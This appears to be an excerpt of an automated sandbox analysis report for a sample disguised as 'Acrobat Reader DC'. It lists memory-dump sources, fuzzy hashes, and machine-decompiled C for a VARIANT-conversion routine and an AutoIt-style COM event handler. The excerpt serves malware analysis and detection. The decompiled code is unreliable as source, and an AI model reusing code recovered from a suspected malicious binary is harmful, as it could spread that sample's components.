                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E0045EA0F(intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				signed short _v12;
				signed short _v20;
				signed int _v24;
				signed int _v26;
				signed int _v28;
				signed int _v30;
				signed short _v34;
				signed int _v36;
				signed int _v40;
				signed short _v44;
				signed int _v48;
				signed int _v52;
				char _v84;
				signed int _t104;
				signed int _t105;
				intOrPtr* _t120;
				intOrPtr _t129;
				signed short* _t130;
				signed int _t131;
				void* _t137;

				_t120 = _a4;
				_t130 = _a8;
				_t104 =  *_t130 & 0x0000ffff;
				_t137 = _t104 - 0x4002;
				if(_t137 > 0) {
					_t105 = _t104 - 0x4003;
					if(_t105 > 0x12) {
						goto L55;
					} else {
						switch( *((intOrPtr*)(_t105 * 4 +  &M0045EEBB))) {
							case 0:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi;
									goto L8;
								}
								goto L9;
							case 1:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__fp0 =  *__esi;
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
								}
								goto L56;
							case 2:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__fp0 =  *__esi;
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
								}
								goto L56;
							case 3:
								goto L55;
							case 4:
								goto L20;
							case 5:
								__eflags = _t130[4];
								if(__eflags != 0) {
									_push(0x10);
									 *((intOrPtr*)(_t120 + 8)) = 8;
									_t108 = E004115D7(_t128, _t130, __eflags);
									_push(_t108);
									 *_t120 = _t108;
									__imp__#8();
									 *((short*)( *_t120)) = 9;
									 *((intOrPtr*)( *_t120 + 8)) =  *(_t130[4]);
									_t111 =  *((intOrPtr*)( *_t120 + 8));
									_push(_t111);
									 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 4))))();
								}
								return 1;
								goto L56;
							case 6:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__eflags =  *__esi;
									_t100 =  *__esi != 0;
									__eflags = _t100;
									__edx = __edx & 0xffffff00 | _t100;
									_a8 = __dl;
									__eax = _a8;
									return E004530C9(__ebx, _a8);
								}
								goto L56;
							case 7:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__ecx = __ebx;
									return E00468070(__ebx, __esi);
								}
								goto L56;
							case 8:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi;
									goto L8;
								}
								goto L9;
							case 9:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi & 0x000000ff;
									goto L8;
								}
								goto L9;
							case 0xa:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi & 0x0000ffff;
									goto L8;
								}
								goto L9;
							case 0xb:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__ecx =  *(__esi + 4);
									__edi =  *__esi;
									__esi = __ebx;
									_v8 = __ecx;
									__eax = E00408F40(__edi, __ebx);
									__edx = _v8;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *(__ebx + 4) = _v8;
									 *__ebx = __edi;
									return __eax;
								}
								goto L56;
							case 0xc:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__edi =  *__esi;
									__eax =  *(__esi + 4);
									goto L15;
								}
								goto L56;
						}
					}
				} else {
					if(_t137 == 0) {
						_t131 = _t130[4];
						if(_t131 != 0) {
							_t129 =  *_t131;
							goto L8;
						}
						goto L9;
					} else {
						if(_t104 > 0x15) {
							L55:
							return 0;
						} else {
							switch( *((intOrPtr*)(_t104 * 4 +  &M0045EE63))) {
								case 0:
									__eax = 0x484ea8;
									return E0040E710(0x484ea8, __ebx, __ecx);
									goto L56;
								case 1:
									__edi =  *(__esi + 8);
									goto L8;
								case 2:
									__edi =  *(__esi + 8);
									goto L8;
								case 3:
									__fp0 =  *(__esi + 8);
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
									goto L56;
								case 4:
									__fp0 =  *(__esi + 8);
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
									goto L56;
								case 5:
									asm("fild qword [esi+0x8]");
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *__ebx = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									return __eax;
									goto L56;
								case 6:
									__fp0 =  *(__esi + 8);
									__eax =  &_v36;
									_push( &_v36);
									__esp = __esp - 8;
									 *__esp =  *(__esi + 8);
									__imp__#185();
									__ecx = _v24 & 0x0000ffff;
									__edx = _v26 & 0x0000ffff;
									__eax = _v28 & 0x0000ffff;
									_push(_v24 & 0x0000ffff);
									__ecx = _v30 & 0x0000ffff;
									_push(_v26 & 0x0000ffff);
									__edx = _v34 & 0x0000ffff;
									_push(_v28 & 0x0000ffff);
									__eax = _v36 & 0x0000ffff;
									_push(_v30 & 0x0000ffff);
									_push(__edx);
									__ecx =  &_v84;
									__eax = E0041329B(__edx,  &_v84, L"%4d%02d%02d%02d%02d%02d", _v36 & 0x0000ffff);
									__eax =  &_v84;
									return E0040E710( &_v84, __ebx, __ecx);
									goto L56;
								case 7:
									L20:
									__eflags =  *(__esi + 8);
									if(__eflags == 0) {
										goto L9;
									} else {
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp =  &(__esp[2]);
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__eflags = 0;
											 *(__ebx + 0xc) = 0;
											 *((intOrPtr*)(__ebx + 8)) = 4;
											return 0;
										} else {
											__edi =  *(__esi + 8);
											__esi = __eax;
											__eax = E00401B10(__edi, __eax, __eflags);
											 *(__ebx + 0xc) = __eax;
											 *((intOrPtr*)(__ebx + 8)) = 4;
											return __eax;
										}
									}
									goto L56;
								case 8:
									_push(0x10);
									 *((intOrPtr*)(_t120 + 8)) = 8;
									_t116 = E004115D7(_t128, _t130, _t138);
									_push(_t116);
									 *_t120 = _t116;
									__imp__#8();
									_t117 =  *_t120;
									_push(_t130);
									_push(_t117);
									__imp__#10();
									if(_t117 < 0) {
										_push( *_t120);
										__imp__#9();
										_push( *_t120);
										E004111DC();
										 *_t120 = 0;
									}
									return 1;
									goto L56;
								case 9:
									goto L55;
								case 0xa:
									__eflags =  *(__esi + 8);
									_t43 =  *(__esi + 8) != 0;
									__eflags = _t43;
									__ecx = __ecx & 0xffffff00 | _t43;
									_a8 = __cl;
									__edx = _a8;
									return E004530C9(__ebx, _a8);
									goto L56;
								case 0xb:
									__eax =  *(__esi + 4);
									__ecx =  *(__esi + 8);
									__edx =  *__esi;
									_v48 =  *(__esi + 4);
									__eax =  &_v20;
									_v44 =  *(__esi + 8);
									_v52 =  *__esi;
									__edx =  *(__esi + 0xc);
									_push( &_v20);
									__ecx =  &_v52;
									_push( &_v52);
									_v40 =  *(__esi + 0xc);
									__imp__#220();
									__fp0 = _v20;
									__esi = __ebx;
									_v12 = _v20;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *__ebx = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									return __eax;
									goto L56;
								case 0xc:
									__edi =  *(__esi + 8);
									goto L8;
								case 0xd:
									__edi =  *(__esi + 8) & 0x000000ff;
									goto L8;
								case 0xe:
									__edi =  *(__esi + 8) & 0x0000ffff;
									L8:
									E00408F40(_t129, _t120);
									 *((intOrPtr*)(_t120 + 8)) = 1;
									 *_t120 = _t129;
									L9:
									return 1;
									goto L56;
								case 0xf:
									__edi =  *(__esi + 8);
									__eax =  *(__esi + 0xc);
									L15:
									__esi = __ebx;
									_v8 = __eax;
									__eax = E00408F40(__edi, __ebx);
									__ecx = _v8;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *(__ebx + 4) = _v8;
									 *__ebx = __edi;
									return __eax;
									goto L56;
								case 0x10:
									__edx =  *(__esi + 0xc);
									__edi =  *(__esi + 8);
									__esi = __ebx;
									_v8 = __edx;
									__eax = E00408F40(__edi, __ebx);
									__eax = _v8;
									 *(__ebx + 4) = __eax;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *__ebx = __edi;
									return __eax;
									goto L56;
							}
						}
					}
				}
				L56:
			}
























                                  0x0045ea16
                                  0x0045ea1a
                                  0x0045ea1d
                                  0x0045ea21
                                  0x0045ea26
                                  0x0045ecbf
                                  0x0045ecc7
                                  0x00000000
                                  0x0045eccd
                                  0x0045eccd
                                  0x00000000
                                  0x0045ed59
                                  0x0045ed5c
                                  0x0045ed5e
                                  0x0045ed64
                                  0x00000000
                                  0x0045ed64
                                  0x00000000
                                  0x00000000
                                  0x0045edb4
                                  0x0045edb7
                                  0x0045edb9
                                  0x00000000
                                  0x0045edbf
                                  0x0045edbf
                                  0x0045edc1
                                  0x0045edc3
                                  0x0045edc6
                                  0x0045edcb
                                  0x0045edce
                                  0x0045edd5
                                  0x0045eddf
                                  0x0045eddf
                                  0x00000000
                                  0x00000000
                                  0x0045ede2
                                  0x0045ede5
                                  0x0045ede7
                                  0x00000000
                                  0x0045eded
                                  0x0045eded
                                  0x0045edef
                                  0x0045edf1
                                  0x0045edf4
                                  0x0045edf9
                                  0x0045edfc
                                  0x0045ee03
                                  0x0045ee0d
                                  0x0045ee0d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045ecd4
                                  0x0045ecd8
                                  0x0045ecda
                                  0x0045ecdc
                                  0x0045ece3
                                  0x0045eceb
                                  0x0045ecec
                                  0x0045ecee
                                  0x0045ecfb
                                  0x0045ed05
                                  0x0045ed0a
                                  0x0045ed0f
                                  0x0045ed13
                                  0x0045ed13
                                  0x0045ed1d
                                  0x00000000
                                  0x00000000
                                  0x0045ee10
                                  0x0045ee13
                                  0x0045ee15
                                  0x00000000
                                  0x0045ee1b
                                  0x0045ee1b
                                  0x0045ee1f
                                  0x0045ee1f
                                  0x0045ee1f
                                  0x0045ee22
                                  0x0045ee25
                                  0x0045ee37
                                  0x0045ee37
                                  0x00000000
                                  0x00000000
                                  0x0045ee3a
                                  0x0045ee3d
                                  0x0045ee3f
                                  0x00000000
                                  0x0045ee45
                                  0x0045ee46
                                  0x0045ee55
                                  0x0045ee55
                                  0x00000000
                                  0x00000000
                                  0x0045ed20
                                  0x0045ed23
                                  0x0045ed25
                                  0x0045ed2b
                                  0x00000000
                                  0x0045ed2b
                                  0x00000000
                                  0x00000000
                                  0x0045ed33
                                  0x0045ed36
                                  0x0045ed38
                                  0x0045ed3e
                                  0x00000000
                                  0x0045ed3e
                                  0x00000000
                                  0x00000000
                                  0x0045ed46
                                  0x0045ed49
                                  0x0045ed4b
                                  0x0045ed51
                                  0x00000000
                                  0x0045ed51
                                  0x00000000
                                  0x00000000
                                  0x0045ed6b
                                  0x0045ed6e
                                  0x0045ed70
                                  0x00000000
                                  0x0045ed76
                                  0x0045ed76
                                  0x0045ed79
                                  0x0045ed7b
                                  0x0045ed7d
                                  0x0045ed80
                                  0x0045ed85
                                  0x0045ed88
                                  0x0045ed8f
                                  0x0045ed92
                                  0x0045ed9c
                                  0x0045ed9c
                                  0x00000000
                                  0x00000000
                                  0x0045ed9f
                                  0x0045eda2
                                  0x0045eda4
                                  0x00000000
                                  0x0045edaa
                                  0x0045edaa
                                  0x0045edac
                                  0x00000000
                                  0x0045edac
                                  0x00000000
                                  0x00000000
                                  0x0045eccd
                                  0x0045ea2c
                                  0x0045ea2c
                                  0x0045ecac
                                  0x0045ecb1
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ea32
                                  0x0045ea35
                                  0x0045ee5a
                                  0x0045ee60
                                  0x0045ea3b
                                  0x0045ea3b
                                  0x00000000
                                  0x0045ec97
                                  0x0045eca9
                                  0x00000000
                                  0x00000000
                                  0x0045eab4
                                  0x00000000
                                  0x00000000
                                  0x0045eac0
                                  0x00000000
                                  0x00000000
                                  0x0045eb19
                                  0x0045eb1c
                                  0x0045eb1e
                                  0x0045eb21
                                  0x0045eb26
                                  0x0045eb29
                                  0x0045eb30
                                  0x0045eb3a
                                  0x00000000
                                  0x00000000
                                  0x0045eb3d
                                  0x0045eb40
                                  0x0045eb42
                                  0x0045eb45
                                  0x0045eb4a
                                  0x0045eb4d
                                  0x0045eb54
                                  0x0045eb5e
                                  0x00000000
                                  0x00000000
                                  0x0045eb61
                                  0x0045eb64
                                  0x0045eb6c
                                  0x0045eb6f
                                  0x0045eb74
                                  0x0045eb77
                                  0x0045eb79
                                  0x0045eb88
                                  0x00000000
                                  0x00000000
                                  0x0045ebf9
                                  0x0045ebfc
                                  0x0045ebff
                                  0x0045ec00
                                  0x0045ec03
                                  0x0045ec06
                                  0x0045ec0c
                                  0x0045ec10
                                  0x0045ec14
                                  0x0045ec18
                                  0x0045ec19
                                  0x0045ec1d
                                  0x0045ec1e
                                  0x0045ec22
                                  0x0045ec23
                                  0x0045ec27
                                  0x0045ec28
                                  0x0045ec2a
                                  0x0045ec33
                                  0x0045ec3b
                                  0x0045ec4b
                                  0x00000000
                                  0x00000000
                                  0x0045eb8b
                                  0x0045eb8b
                                  0x0045eb8f
                                  0x00000000
                                  0x0045eb95
                                  0x0045eb95
                                  0x0045eb97
                                  0x0045eb9c
                                  0x0045eb9f
                                  0x0045eba1
                                  0x0045ebc2
                                  0x0045ebc2
                                  0x0045ebc4
                                  0x0045ebc7
                                  0x0045ebd6
                                  0x0045eba3
                                  0x0045eba3
                                  0x0045eba6
                                  0x0045eba8
                                  0x0045ebad
                                  0x0045ebb0
                                  0x0045ebbf
                                  0x0045ebbf
                                  0x0045eba1
                                  0x00000000
                                  0x00000000
                                  0x0045ea42
                                  0x0045ea44
                                  0x0045ea4b
                                  0x0045ea53
                                  0x0045ea54
                                  0x0045ea56
                                  0x0045ea5c
                                  0x0045ea5e
                                  0x0045ea5f
                                  0x0045ea60
                                  0x0045ea68
                                  0x0045ea6c
                                  0x0045ea6d
                                  0x0045ea75
                                  0x0045ea76
                                  0x0045ea7e
                                  0x0045ea7e
                                  0x0045ea8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045ebd9
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebe1
                                  0x0045ebe4
                                  0x0045ebf6
                                  0x00000000
                                  0x00000000
                                  0x0045ec4e
                                  0x0045ec51
                                  0x0045ec54
                                  0x0045ec56
                                  0x0045ec59
                                  0x0045ec5c
                                  0x0045ec5f
                                  0x0045ec62
                                  0x0045ec65
                                  0x0045ec66
                                  0x0045ec69
                                  0x0045ec6a
                                  0x0045ec6d
                                  0x0045ec73
                                  0x0045ec76
                                  0x0045ec78
                                  0x0045ec7b
                                  0x0045ec80
                                  0x0045ec83
                                  0x0045ec85
                                  0x0045ec94
                                  0x00000000
                                  0x00000000
                                  0x0045ea8f
                                  0x00000000
                                  0x00000000
                                  0x0045eaae
                                  0x00000000
                                  0x00000000
                                  0x0045eaba
                                  0x0045ea93
                                  0x0045ea95
                                  0x0045ea9a
                                  0x0045eaa1
                                  0x0045eaa3
                                  0x0045eaab
                                  0x00000000
                                  0x00000000
                                  0x0045eac5
                                  0x0045eac8
                                  0x0045eacb
                                  0x0045eacb
                                  0x0045eacd
                                  0x0045ead0
                                  0x0045ead5
                                  0x0045ead8
                                  0x0045eadf
                                  0x0045eae2
                                  0x0045eaec
                                  0x00000000
                                  0x00000000
                                  0x0045eaef
                                  0x0045eaf2
                                  0x0045eaf5
                                  0x0045eaf7
                                  0x0045eafa
                                  0x0045eaff
                                  0x0045eb02
                                  0x0045eb05
                                  0x0045eb0c
                                  0x0045eb16
                                  0x00000000
                                  0x00000000
                                  0x0045ea3b
                                  0x0045ea35
                                  0x0045ea2c
                                  0x00000000

                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E004091B0(void* __edx, void* __fp0, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int* _v28;
				char _v32;
				signed int _v36;
				char _v40;
				short _v42;
				short _v44;
				char _v52;
				char _v60;
				signed int _v64;
				char _v72;
				char _v76;
				char _v80;
				signed int* _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t133;
				signed int _t134;
				signed int _t141;
				intOrPtr _t163;
				signed int _t180;
				signed int _t181;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t188;
				signed int _t203;
				intOrPtr* _t204;
				intOrPtr _t209;
				char _t217;
				void* _t218;
				intOrPtr _t235;
				signed int _t239;
				void* _t243;
				signed int _t247;
				signed int _t250;
				intOrPtr _t257;
				signed int _t258;
				signed int _t264;
				signed int _t270;
				char _t271;
				signed int _t273;
				intOrPtr _t274;
				intOrPtr _t283;
				void* _t287;

				_t287 = __fp0;
				_t243 = __edx;
				if( *0x4a7f18 != 0) {
					_t271 = _a4;
					__eflags =  *((char*)(_t271 + 0x480)) - 1;
					if(__eflags == 0) {
						goto L1;
					}
					_t219 =  &_v120;
					_v24 = 0;
					_v88 = 0x488088;
					_v84 = 0;
					_v80 = 0;
					_v76 = 0;
					_v72 = 0;
					_v64 = 1;
					_v60 = 0;
					E0040BC70( &_v120, __eflags);
					InterlockedIncrement(0x4a7f04);
					_t133 =  *0x4a7f04; // 0x0
					__eflags = _t133 - 1;
					if(_t133 == 1) {
						L8:
						_t134 =  *0x4a7f0c; // 0x0
						__eflags =  *0x4a7f08 - _t134; // 0x0
						if(__eflags == 0) {
							L12:
							InterlockedDecrement(0x4a7f04);
							E00402250( &_v120);
							E00408F40(_t262,  &_v72);
							E00410C60( &_v88, _t262);
							goto L1;
						}
						_t12 = ((_t134 & 0x0000003f) << 4) + 0x4a9138; // 0x4a9138
						_t262 = _t12;
						_t141 = E00431DC9(_t262);
						__eflags = _t141;
						if(_t141 != 0) {
							goto L12;
						}
						_t13 = _t262 + 4; // 0x0
						_v36 = _t262;
						E00408E80( &_v72, _t219,  *((intOrPtr*)( *_t13)));
						_t16 = _t262 + 4; // 0x0
						_t216 = E0045340C( *((intOrPtr*)( *_t16 + 4)));
						E00402160( &_v120, _t146, _t243, _t262);
						_t19 = _t262 + 4; // 0x0
						_t262 = E0045340C( *((intOrPtr*)( *_t19 + 8)));
						E0040D200( &_v120,  *_t16, _t150, _t287);
						__eflags = E00465124(_v120,  &_v20, __eflags, _t271, _v120,  &_v32,  &_v20,  &_v28,  &_v40);
						if(__eflags != 0) {
							 *((char*)(_t271 + 0x480)) = 1;
							_t273 =  &_v104;
							E00401B10(L"@COM_EVENTOBJ", _t273, __eflags);
							E00401980(2, 1, E00432508( &_v72), _t273);
							_t226 = _t273;
							E00402250(_t273);
							_t163 = E0040F410(_v32);
							__eflags = _v20;
							_t274 = _t163;
							_v16 = _t274;
							if(_v20 <= 0) {
								L25:
								_t247 =  *0x4a7f0c; // 0x0
								_t250 = ((_t247 & 0x0000003f) << 4) + 0x4a9138;
								E0046FE32(_t250);
								_t264 = 1;
								 *0x4a7f0c =  *0x4a7f0c + 1;
								InterlockedDecrement(0x4a7f04);
								E0046FF07(_t216, 1, _v32);
								__eflags = _v20 - 1;
								if(_v20 < 1) {
									L48:
									_t217 = _a4;
									E0047D33E(_t226, _t250, _t287, _t217, _v32 + 1, 0, 0);
									E0046FEB1(0x4a7f34);
									_t265 = L"@COM_EVENTOBJ";
									E00401B10(L"@COM_EVENTOBJ",  &_v104, __eflags);
									E0040C2C0(2,  &_v104,  &_a4,  &_v24);
									E00402250( &_v104);
									__eflags =  *0x4a7f18;
									if( *0x4a7f18 == 0) {
										L29:
										 *((char*)(_t217 + 0x480)) = 0;
										L30:
										E00402250( &_v120);
										E00408F40(_t265,  &_v72);
										E00410C60( &_v88, _t265);
										return 1;
									}
									_t180 = E00432416(_a4);
									__eflags = _t180;
									if(_t180 != 0) {
										goto L29;
									}
									_t181 =  *0x4a7f1c; // 0x0
									__eflags = _t181;
									if(_t181 == 0) {
										goto L29;
									}
									 *((char*)(_t181 + 0x40)) = 0;
									goto L29;
								}
								_t62 = _t264 + 0xb; // 0xc
								_t218 = _t62;
								_v12 = 0x18;
								_v28 = _v84;
								while(1) {
									_v36 = _t264;
									__eflags = _t264 - _v24;
									if(_t264 <= _v24) {
										goto L40;
									}
									_v40 = 0;
									_v42 = 0;
									_t188 =  *((intOrPtr*)(_t274 + 4));
									_v104 = 0x485a84;
									_v100 = 0;
									_v96 = 0;
									_v92 = 0;
									_t235 =  *((intOrPtr*)(_t218 + _t188 + 4));
									__eflags =  *((short*)(_t235 + 8)) - 0x41;
									_v44 = _t250 | 0xffffffff;
									if( *((short*)(_t235 + 8)) != 0x41) {
										E00408F40(_t264,  &_v72);
										_v64 = 1;
										_v72 = 0;
										L39:
										_t250 =  &_v72;
										E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
										E0044B469(__eflags,  &_v52);
										E0040EDC0( &_v104, _t264,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
										L41:
										_t185 =  *((intOrPtr*)(_v16 + 4));
										_t226 =  *(_t218 + _t185 + 4);
										__eflags =  *((short*)(_t226 + 8)) - 0x41;
										if( *((short*)(_t226 + 8)) != 0x41) {
											_t186 = 8;
											L47:
											_v12 = _v12 + _t186;
											_t264 = _t264 + 1;
											_t218 = _t218 + _t186;
											__eflags = _t264 - _v20;
											if(_t264 <= _v20) {
												_t71 =  &_v28;
												 *_t71 =  &(_v28[1]);
												__eflags =  *_t71;
												_t274 = _v16;
												continue;
											}
											goto L48;
										}
										_t250 =  *(_t218 + _t185 + 8);
										_t203 =  *(_t250 + 8) & 0x0000ffff;
										__eflags = _t203 - 0x4a;
										if(_t203 == 0x4a) {
											L45:
											_t186 = 0x14;
											goto L47;
										}
										__eflags = _t203 - 0x49;
										if(_t203 == 0x49) {
											goto L45;
										}
										_t186 = 0x10;
										goto L47;
									}
									_t195 =  *((intOrPtr*)(_t218 + _t188 + 8));
									_t239 =  *( *((intOrPtr*)(_t218 + _t188 + 8)) + 8) & 0x0000ffff;
									__eflags = _t239 - 0x4a;
									if(_t239 == 0x4a) {
										L36:
										E00402780(_t195, _t239,  &_v104);
										_t195 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t274 + 4))));
										L37:
										E00402780(_t195, _t239,  &_v104);
										E00402710(0x7f,  &_v52, _t287);
										E00402780( &_v52, _t239,  &_v104);
										E0040A780(_a4, _t287,  &_v104,  &_v40,  &_v72, 0xffffffff);
										_t264 = _v36;
										goto L39;
									}
									__eflags = _t239 - 0x49;
									if(_t239 != 0x49) {
										goto L37;
									}
									goto L36;
									L40:
									_t250 =  *_v28;
									__eflags = 0;
									E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_t274 + 4)))))));
									goto L41;
								}
							}
							_t216 = 3;
